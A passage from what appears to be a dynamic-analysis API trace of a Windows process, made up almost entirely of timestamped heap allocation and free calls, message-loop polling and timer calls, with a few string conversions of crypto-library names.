(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0158.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0158.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0158.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0158.592] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0158.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0158.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0158.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0158.593] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.593] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0158.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0158.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0158.594] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0158.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0158.594] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0158.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0158.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0158.595] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.595] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0158.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0158.595] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0158.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0158.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0158.596] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0158.596] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0158.596] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0158.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0158.596] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0158.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0158.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0158.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0158.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0158.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0158.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0158.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0158.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0158.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0158.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0158.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0158.725] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0158.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0158.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0158.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0158.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0158.758] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0158.758] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0158.758] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0158.758] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0158.759] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0158.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0158.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0158.759] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0158.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0158.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0158.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0158.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0158.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 